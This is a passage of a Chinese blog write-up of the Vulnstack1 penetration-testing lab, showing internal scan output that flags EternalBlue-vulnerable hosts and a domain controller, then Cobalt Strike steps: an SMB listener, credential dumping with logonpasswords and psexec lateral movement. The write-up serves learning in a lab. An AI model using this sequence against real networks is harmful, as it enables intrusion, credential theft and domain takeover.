(ICMP)<br>[+] 目标 192.168.52.141  存活 (ICMP)<br>[+] ICMP存活主机数量: 4<br>[*] 共解析 218 个有效端口<br>[+] 端口开放 192.168.52.141:8099<br>[+] 端口开放 192.168.52.141:8098<br>[+] 端口开放 192.168.52.143:80<br>[+] 端口开放 192.168.52.138:80<br>[+] 端口开放 192.168.52.141:21<br>[+] 端口开放 192.168.52.1:139<br>[+] 端口开放 192.168.52.1:3306<br>[+] 端口开放 192.168.52.1:445<br>[+] 端口开放 192.168.52.1:135<br>[+] 端口开放 192.168.52.141:445<br>[+] 端口开放 192.168.52.143:445<br>[+] 端口开放 192.168.52.138:445<br>[+] 端口开放 192.168.52.138:139<br>[+] 端口开放 192.168.52.143:3306<br>[+] 端口开放 192.168.52.141:135<br>[+] 端口开放 192.168.52.141:139<br>[+] 端口开放 192.168.52.143:135<br>[+] 端口开放 192.168.52.138:135<br>[+] 端口开放 192.168.52.143:139<br>[+] 端口开放 192.168.52.138:88<br>[+] 端口开放 192.168.52.141:7002<br>[+] 端口开放 192.168.52.141:7001<br>[+] 端口开放 192.168.52.1:7890<br>[+] 存活端口数量: 23<br>[*] 开始漏洞扫描...<br>[!] 扫描错误 192.168.52.1:3306 - Error 1130: Host &#x27;cxcx&#x27; is not allowed to connect to this MySQL server<br>[!] 扫描错误 192.168.52.1:445 - read tcp 192.168.6.135:39408-&gt;192.168.52.1:445: read: connection reset by peer<br>[*] NetInfo<br>[*] 192.168.52.1<br><span class="hljs-meta prompt_">   [-&gt;</span><span class="language-bash">] cxcx</span><br><span class="hljs-meta prompt_">   [-&gt;</span><span class="language-bash">] 172.22.224.1</span><br><span class="hljs-meta prompt_">   [-&gt;</span><span class="language-bash">] 192.168.111.1</span><br><span class="hljs-meta prompt_">   [-&gt;</span><span class="language-bash">] 192.168.6.1</span><br><span class="hljs-meta prompt_">   [-&gt;</span><span class="language-bash">] 192.168.56.1</span><br><span class="hljs-meta prompt_">   [-&gt;</span><span class="language-bash">] 10.34.11.4</span><br><span class="hljs-meta prompt_">   [-&gt;</span><span class="language-bash">] 198.18.0.1</span><br><span class="hljs-meta prompt_">   [-&gt;</span><span class="language-bash">] 192.168.52.1</span><br><span class="hljs-meta prompt_">   [-&gt;</span><span class="language-bash">] 192.168.33.1</span><br>[*] 网站标题 http://192.168.52.1:7890  状态码:400 长度:0      标题:无标题<br>[!] 扫描错误 192.168.52.1:7890 - Get &quot;https://192.168.52.1:7890&quot;: EOF<br>[!] 扫描错误 192.168.52.143:139 - netbios error<br>[*] NetInfo<br>[*] 192.168.52.138<br><span class="hljs-meta prompt_">   [-&gt;</span><span class="language-bash">] owa</span><br><span class="hljs-meta prompt_">   [-&gt;</span><span class="language-bash">] 192.168.52.138</span><br>[!] 扫描错误 192.168.52.141:139 - netbios error<br>[*] NetInfo<br>[*] 192.168.52.141<br><span class="hljs-meta prompt_">   [-&gt;</span><span class="language-bash">] root-tvi862ubeh</span><br><span class="hljs-meta prompt_">   [-&gt;</span><span class="language-bash">] 192.168.52.141</span><br>[!] 扫描错误 192.168.52.138:88 - Get &quot;http://192.168.52.138:88&quot;: read tcp 192.168.6.135:50074-&gt;192.168.52.138:88: read: connection reset by peer<br>[*] NetInfo<br>[*] 192.168.52.143<br><span class="hljs-meta prompt_">   [-&gt;</span><span class="language-bash">] stu1</span><br><span class="hljs-meta prompt_">   [-&gt;</span><span class="language-bash">] 192.168.33.129</span><br><span class="hljs-meta prompt_">   [-&gt;</span><span class="language-bash">] 192.168.52.143</span><br><span class="hljs-meta prompt_">   [-&gt;</span><span class="language-bash">] 169.254.129.186</span><br>[+] MS17-010 192.168.52.143     (Windows 7 Professional 7601 Service Pack 1)<br>[+] MS17-010 192.168.52.138     (Windows Server 2008 R2 Datacenter 7601 Service Pack 1)<br>[*] NetBios 192.168.52.138  [+] DC:owa.god.org                   Windows Server 2008 R2 Datacenter 7601 Service Pack 1<br>[*] 网站标题 http://192.168.52.141:7002 状态码:200 长度:2632   标题:Sentinel Keys License Monitor<br>[+] MS17-010 192.168.52.141     (Windows Server 2003 3790)<br>[*] 网站标题 http://192.168.52.138     状态码:200 长度:689    标题:IIS7<br>[+] ftp 192.168.52.141:21:anonymous <br>[*] 网站标题 http://192.168.52.143     状态码:200 长度:14749  标题:phpStudy 探针 2014<br>[*] 网站标题 https://192.168.52.141:8098 状态码:401 长度:1656   标题:You are not authorized to view this page<br>[*] 网站标题 http://192.168.52.141:8099 状态码:403 长度:1409   标题:The page must be viewed over a secure channel<br>[!] 扫描错误 192.168.52.1:139 - netbios error<br>[!] 扫描错误 192.168.52.141:7001 - Get &quot;http://192.168.52.141:7001&quot;: context deadline exceeded (Client.Timeout exceeded while awaiting headers)<br>[!] 扫描错误 192.168.52.143:3306 - Error 1130: Host &#x27;192.168.52.1&#x27; is not allowed to connect to this MySQL server<br>[+] 扫描已完成: 23/23<br>[*] 扫描结束,耗时: 53.495039221s <br></code></pre></td></tr></table></figure>

<p>其中 域控<code>owa: 192.168.52.138</code> ,域内成员 <code>root-tvi862ubeh:192.168.52.141</code></p>
<p>并且都存在永恒之蓝漏洞。</p>
<h3 id="CS上线域控"><a href="#CS上线域控" class="headerlink" title="CS上线域控"></a>CS上线域控</h3><p>创建一个 <code>SMB</code>的监听器 </p>
<p><img src="/img/vulnstack1/image-20250425121356546.png" srcset="/img/loading.gif" lazyload></p>
<p>通过<code>logonpasswords</code>获取到明文密码。</p>
<p><img src="/img/vulnstack1/image-20250425121443034.png" srcset="/img/loading.gif" lazyload></p>
<p><img src="/img/vulnstack1/image-20250425121501215.png" srcset="/img/loading.gif" lazyload></p>
<p>进行横向移动<code>psexec</code></p>
<p><img src="/img/vulnstack1/image-20250425121546928.png" srcset="/img/loading.gif" lazyload></p>
<p>选择明文密码以及监听器，session选择一个正常的域内已控主机</p>
<p>接着就成功进行上线，域成员也是如此。</p>
<p><img src="/img/vulnstack1/image-20250425121634086.png" srcset="/img/loading.gif" lazyload></p>
<p>我这里多次执行了所以多了一些重复的。</p>
<blockquote>
<p>第一次打内网，有些基础不牢，未来我会慢慢补充的。</p>
</blockquote>

                
              </div>
            
            <hr/>
            <div>
              <div class="post-metas my-3">
  
    <div class="post-meta mr-3 d-flex align-items-center">
      <i class="iconfont icon-category"></i>
      

<span class="category-chains">
  
  
    
      <span class="category-chain">
        
  <a href="/categories/%E9%9D%B6%E6%9C%BA/" class="category-chain-item">靶机</a>
  
  

      </span>
    
  
</span>

    </div>
  
  
    <div class="post-meta">
      <i class="iconfont icon-tags"></i>
      
        <a href="/tags/%E6%B8%97%E9%80%8F/" class="print-no-link">#渗透</a>
      
        <a href="/tags/%E5%86%85%E7%BD%91/" class="print-no-link">#内网</a>
      
    </div>
  
</div>


              
  

  <div class="license-box my-3">
    <div class="license-title">
      <div>vulnstack1</div>
      <div>https://r3bir7hcx.github.io/2025/04/24/vulnstack1/</div>
    </div>
    <div class="license-meta">
      
        <div class="license-meta-item">
          <div>Author</div>
          <div>CXCX</div>
        </div>
      
      
        <div class="license-meta-item license-meta-date">
          <div>Posted on</div>
          <div>April 24, 2025</div>
        </div>
      
      
      
        <div class="license-meta-item">
          <div>Licensed under</div>
          <div>
            
              
              
                <a class="print-no-link" target="_blank" href="https://creativecommons.org/licenses/by/4.0/">
                  <span class="hint--top hint--rounded" aria-label="BY - Attribution">
                    <i class="iconfont icon-cc-by"></i>
                  </span>
                </a>
              
            
          </div>
        </div>
      
    </div>
    <div class="license-icon iconfont"></div>
  </div>



              
                <div class="post-prevnext my-3">
                  <article class="post-prev col-6">
                    
                    
                  </article>
                  <article class="post-next col-6">
                    
                    
                      <a href="/2025/04/24/vulnyx-Anon/" title="vulnyx-Anon">
                        <span class="hidden-mobile">vulnyx-Anon</span>
                        <span class="visible-mobile">Next</span>
                        <i class="iconfont icon-arrowright"></i>
                      </a>
                    
                  </article>
                </div>
              
            </div>

            
          </article>
        </div>
      </div>
    </div>

    <div class="side-col d-none d-lg-block col-lg-2">
      
  <aside class="sidebar" style="margin-left: -1rem">
    <div id="toc">
  <p class="toc-header">
    <i class="iconfont icon-list"></i>
    <span>Table of Contents</span>
  </p>
  <div class="toc-body" id="toc-body"></div>
</div>



  </aside>


    </div>
  </div>
</div>





  



  



  



  



  







    

    
      <a id="scroll-top-button" aria-label="TOP" href="#" role="button">
        <i class="iconfont icon-arrowup" aria-hidden="true"></i>
      </a>
    

    
      <div class="modal fade" id="modalSearch" tabindex="-1" role="dialog" aria-labelledby="ModalLabel"
     aria-hidden="true">
  <div class="modal-dialog modal-dialog-scrollable modal-lg" role="document">
    <div class="modal-content">
      <div class="modal-header text-center">
        <h4 class="modal-title w-100 font-weight-bold">Search</h4>
        <button type="button" id="local-search-close" class="close" data-dismiss="modal" aria-label="Close">
          <span aria-hidden="true">&times;</span>
        </button>
      </div>
      <div class="modal-body mx-3">
        <div class="md-form mb-5">
          <input type="text" id="local-search-input" class="form-control validate">
          <label data-error="x" data-success="v" for="local-search-input">Keyword</label>
        </div>
        <div class="list-group" id="local-search-result"></div>
      </div>
    </div>
  </div>
</div>

    

    
  </main>

  <footer>
    <div class="footer-inner">
  
    <div class="footer-content">
       <a href="https://hexo.io" target="_blank" rel="nofollow noopener"><span>Hexo</span></a> <i class="iconfont icon-love"></i> <a href="https://github.com/fluid-dev/hexo-theme-fluid" target="_blank" rel="nofollow noopener"><span>Fluid</span></a> 
    </div>
  
  
  
</div>

  </footer>

  <!-- Scripts -->
  
  <script  src="https://lib.baomitu.com/nprogress/0.2.0/nprogress.min.js" ></script>
  <link  rel="stylesheet" href="https://lib.baomitu.com/nprogress/0.2.0/nprogress.min.css" />

  <script>
    NProgress.configure({"showSpinner":false,"trickleSpeed":100})
    NProgress.start()
    window.addEventListener('load', function() {
      NProgress.done();
    })
  </script>


<script  src="https://lib.baomitu.com/jquery/3.6.4/jquery.min.js" ></script>
<script  src="https://lib.baomitu.com/twitter-bootstrap/4.6.1/js/bootstrap.min.js" ></script>
<script  src="/js/events.js" ></script>
<script  src="/js/plugins.js" ></script>


  <script  src="https://lib.baomitu.com/typed.js/2.0.12/typed.min.js" ></script>
  <script>
    (function (window, document) {
      var typing = Fluid.plugins.typing;
      var subtitle = document.getElementById('subtitle');
      if (!subtitle || !typing) {
        return;
      }
      var text = subtitle.getAttribute('data-typed-text');
      
        typing(text);
      
    })(window, document);
  </script>




  
    <script  src="/js/img-lazyload.js" ></script>
  




  
<script>
  Fluid.utils.createScript('https://lib.baomitu.com/tocbot/4.20.1/tocbot.min.js', function() {
    var toc = jQuery('#toc');
    if (toc.length === 0 || !window.tocbot) { return; }
    var boardCtn = jQuery('#board-ctn');
    var boardTop = boardCtn.offset().top;

    window.tocbot.init(Object.assign({
      tocSelector     : '#toc-body',
      contentSelector : '.markdown-body',
      linkClass       : 'tocbot-link',
      activeLinkClass : 'tocbot-active-link',
      listClass       : 'tocbot-list',
      isCollapsedClass: 'tocbot-is-collapsed',
      collapsibleClass: 'tocbot-is-collapsible',
      scrollSmooth    : true,
      includeTitleTags: true,
      headingsOffset  : -boardTop,
    }, CONFIG.toc));
    if (toc.find('.toc-list-item').length > 0) {
      toc.css('visibility', 'visible');
    }

    Fluid.events.registerRefreshCallback(function() {
      if ('tocbot' in window) {
        tocbot.refresh();
        var toc = jQuery('#toc');
        if (toc.length === 0 || !tocbot) {
          return;
        }
        if (toc.find('.toc-list-item').length > 0) {
          toc.css('visibility', 'visible');
        }
      }
    });
  });
</script>


  <script src=https://lib.baomitu.com/clipboard.js/2.0.11/clipboard.min.js></script>

  <script>Fluid.plugins.codeWidget();</script>


  
<script>
  Fluid.utils.createScript('https://lib.baomitu.com/anchor-js/5.0.0/anchor.min.js', function() {
    window.anchors.options = {
      placement: CONFIG.anchorjs.placement,
      visible  : CONFIG.anchorjs.visible
    };
    if (CONFIG.anchorjs.icon) {
      window.anchors.options.icon = CONFIG.anchorjs.icon;
    }
    var el = (CONFIG.anchorjs.element || 'h1,h2,h3,h4,h5,h6').split(',');
    var res = [];
    for (var item of el) {
      res.push('.markdown-body > ' + item.trim());
    }
    if (CONFIG.anchorjs.placement === 'left') {
      window.anchors.options.class = 'anchorjs-link-left';
    }
    window.anchors.add(res.join(', '));

    Fluid.events.registerRefreshCallback(function() {
      if ('anchors' in window) {
        anchors.removeAll();
        var el = (CONFIG.anchorjs.element || 'h1,h2,h3,h4,h5,h6').split(',');
        var res = [];
        for (var item of el) {
          res.push('.markdown-body > ' + item.trim());
        }
        if (CONFIG.anchorjs.placement === 'left') {
          anchors.options.class = 'anchorjs-link-left';
        }
        anchors.add(res.join(', '));
      }
    });
  });
</script>


  
<script>
  Fluid.utils.createScript('https://lib.baomitu.com/fancybox/3.5.7/jquery.fancybox.min.js', function() {
    Fluid.plugins.fancyBox();
  });
</script>


  <script>Fluid.plugins.imageCaption();</script>

  <script  src="/js/local-search.js" ></script>





<!-- 主题的启动项，将它保持在最底部 -->
<!-- the boot of the theme, keep it at the bottom -->
<script  src="/js/boot.js" ></script>


  

  <noscript>
    <div class="noscript-warning">Blog works best with JavaScript enabled</div>
  </noscript>
</body>
</html>
